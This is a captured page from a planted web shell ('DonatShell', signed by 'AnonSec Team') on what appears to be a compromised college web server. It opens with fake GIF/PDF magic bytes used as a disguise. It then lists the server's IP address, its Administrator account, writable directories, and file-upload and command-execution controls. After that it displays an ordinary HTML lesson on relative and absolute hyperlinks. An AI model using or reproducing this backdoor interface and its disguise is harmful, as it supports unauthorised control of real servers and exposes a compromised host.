GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/_Archive/MMDT1021/AllenSite/ch6/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/_Archive/MMDT1021/AllenSite/ch6//MMDT1021 Chapter 6 Notes - page 1.htm
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<!-- saved from url=(0054)http://mmdt1021.ridgewater.net/chapter6/chapter6p1.htm -->
<HTML xmlns="http://www.w3.org/1999/xhtml"><HEAD><TITLE>MMDT1021 Chapter 6 Notes - page 1</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1"><LINK 
href="MMDT1021%20Chapter%206%20Notes%20-%20page%201_files/style.css" 
type=text/css rel=stylesheet>
<META content="MSHTML 6.00.6000.16481" name=GENERATOR></HEAD>
<BODY>
<P class=pagetitle align=center>MMDT1021 Chapter 6 Notes - page 1</P>
<P class=sectiontitle>Creating a Link to Another Web Page</P>
<TABLE cellSpacing=0 cellPadding=4 width=750 bgColor=#ffffff border=0>
  <TBODY>
  <TR>
    <TD width="100%">Link to a <B>relative</B> page.<BR>The page is in the 
      same directory/folder as the calling page.</TD></TR></TBODY></TABLE>
<TABLE width=750 bgColor=#ffffff border=1>
  <TBODY>
  <TR>
    <TH width="50%">Code</TH>
    <TH width="50%">Result</TH></TR>
  <TR>
    <TD width="50%"><CODE>This is some text before the link.<BR>&lt;a 
      href="chapter6p2.htm"&gt;MMDT1021 Chapter 6 Notes - page 
      2&lt;/a&gt;<BR>This is some text after the link.</CODE></TD>
    <TD width="50%">This is some text before the link. <A 
      href="http://mmdt1021.ridgewater.net/chapter6/chapter6p2.htm">MMDT1021 
      Chapter 6 Notes - page 2</A> This is some text after the 
  link.</TD></TR></TBODY></TABLE>&nbsp; 
<TABLE cellSpacing=0 cellPadding=4 width=750 bgColor=#ffffff border=0>
  <TBODY>
  <TR>
    <TD width="100%">Link to a <B>relative</B> page.<BR>The page is in a 
      directory/folder under the calling page.<BR>In this case, the page is in 
      the "examples" sub-directory.</TD></TR></TBODY></TABLE>
<TABLE width=750 bgColor=#ffffff border=1>
  <TBODY>
  <TR>
    <TH width="50%">Code</TH>
    <TH width="50%">Result</TH></TR>
  <TR>
    <TD width="50%"><CODE>This is some text before the link. &lt;a 
      href="examples/chapter6p1a.htm"&gt; Example 6 page 1A &lt;/a&gt; This is 
      some text after the link.</CODE></TD>
    <TD width="50%">This is some text before the link. <A 
      href="http://mmdt1021.ridgewater.net/chapter6/examples/chapter6p1a.htm">Example 
      6 page 1A</A> This is some text after the link.</TD></TR></TBODY></TABLE>&nbsp; 
<TABLE cellSpacing=0 cellPadding=4 width=750 bgColor=#ffffff border=0>
  <TBODY>
  <TR>
    <TD width="100%">Link to a <B>relative</B> page.<BR>The page is in a 
      directory/folder above the calling page.<BR>Note the "../" in the link - 
      the linked directory in one level up.</TD></TR></TBODY></TABLE>
<TABLE width=750 bgColor=#ffffff border=1>
  <TBODY>
  <TR>
    <TH width="50%">Code</TH>
    <TH width="50%">Result</TH></TR>
  <TR>
    <TD width="50%"><CODE>This is some text before the link. &lt;a 
      href="../schedule.htm"&gt;MMDT1021 Class Schedule&lt;/a&gt; This is some 
      text after the link.</CODE></TD>
    <TD width="50%">This is some text before the link. <A 
      href="http://mmdt1021.ridgewater.net/schedule.htm">MMDT1021 Class 
      Schedule</A> This is some text after the link.</TD></TR></TBODY></TABLE>&nbsp; 
<TABLE cellSpacing=0 cellPadding=4 width=750 bgColor=#ffffff border=0>
  <TBODY>
  <TR>
    <TD width="100%">Link to an <B>absolute</B> page.<BR>The page is in any 
      directory/folder on the same server.<BR>Note the link begins with a "/" - 
      this makes it an absolute link.</TD></TR></TBODY></TABLE>
<TABLE width=750 bgColor=#ffffff border=1>
  <TBODY>
  <TR>
    <TH width="50%">Code</TH>
    <TH width="50%">Result</TH></TR>
  <TR>
    <TD width="50%"><CODE>This is some text before the link. &lt;a 
      href="/filesutilities/filesutilites.htm"&gt;Files and Utilites &lt;/a&gt; 
      This is some text after the link.</CODE></TD>
    <TD width="50%">This is some text before the link. <A 
      href="http://mmdt1021.ridgewater.net/filesutilities/filesutilities.htm">Files 
      and Utilites </A>This is some text after the 
link.</TD></TR></TBODY></TABLE>&nbsp; 
<TABLE cellSpacing=0 cellPadding=4 width=750 bgColor=#ffffff border=0>
  <TBODY>
  <TR>
    <TD width="100%">Link to an <B>absolute</B> page on a server.<BR>The page 
      is in any directory/folder on any server.<BR>Note the link begins with a 
      "http://" - this makes it an absolute link to a 
server/page.</TD></TR></TBODY></TABLE>
<TABLE width=750 bgColor=#ffffff border=1>
  <TBODY>
  <TR>
    <TH width="50%">Code</TH>
    <TH width="50%">Result</TH></TR>
  <TR>
    <TD width="50%"><CODE>This is some text before the link. &lt;a 
      href="http://www.ridgewater.edu"&gt; Ridgewater College&lt;/a&gt; This is 
      some text after the link.</CODE></TD>
    <TD width="50%">This is some text before the link. <A 
      href="http://www.ridgewater.edu/">Ridgewater College</A> This is some text 
      after the link.</TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=4 width=750 bgColor=#ffffff border=0>
  <TBODY>
  <TR>
    <TD width="100%"><BR>Not all web sites have "www" in the beginning of 
      their web address.&nbsp; Examples are <A 
      href="http://cst.ridgewater.edu/">http://cst.ridgewater.edu/</A> and <A 
      href="http://java.sun.com/">http://java.sun.com/</A> 
      <P>Not all web sites have three parts in their web web address.&nbsp; An 
      example is <A 
      href="http://www.ridgewater.mnscu.edu/">http://www.ridgewater.mnscu.edu/</A> 
      which has four parts.</P>
      <P>The city of Hutchinson has five parts. <A 
      href="http://www.ci.hutchinson.mn.us/">http://www.ci.hutchinson.mn.us/</A></P></TD></TR></TBODY></TABLE>
<P></P>
<TABLE cellSpacing=0 cellPadding=4 width=750 bgColor=#ffffff border=0>
  <TBODY>
  <TR>
    <TD width="100%"><B>Case sEnSiTiVe</B><BR>Note that some Web Servers are 
      case sensitive. If a Web Server is case sensitive, "index.html" is 
      <B>not</B> the same as "Index.html" or "bitsnbytes.htm" is not the same as 
      "BitsnBytes.htm. Be aware of this when creating links. 
      <P>Servers running Unix or Linux are case sensitive.&nbsp; Servers running 
      Windows are not case sensitive, but they are case <B>aware</B>.&nbsp; 
      Therefore is is always a good idea to always pay attention to case of file 
      names to avoid any problems.</P>
      <P><B>Short Links</B><BR>Don't make link labels too long. Keep them short. 
      Only use the key word or words to make your link label. </P>
      <P><B><STRIKE>Click Here</STRIKE></B><BR>Try not to use "Click Here" for a 
      label. Instead use key words that already exist in your text to identify 
      the link.</P></TD></TR></TBODY></TABLE></BODY></HTML>

Anon7 - 2022
AnonSec Team